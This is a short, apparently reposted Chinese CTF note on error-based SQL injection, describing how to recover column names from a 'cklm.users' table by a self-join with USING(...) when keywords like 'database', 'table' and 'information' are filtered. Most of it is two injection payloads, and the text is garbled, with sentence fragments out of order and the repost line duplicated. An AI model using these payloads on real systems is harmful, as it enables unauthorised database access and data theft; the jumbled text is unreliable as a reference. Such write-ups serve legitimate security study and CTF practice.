这个题是把
接下来的可以用这个语句报错注入
然后
转载于:https://www.cnblogs.com/wangshuwin/p/7867873.html
database
,table
,information
这些都过滤了所以没法查infomation_schema查数据select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username))c);
这个语句可以把username这个字段进行爆出来select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username,password))c);
这样可以依次爆出剩下的字段转载于:https://www.cnblogs.com/wangshuwin/p/7867873.html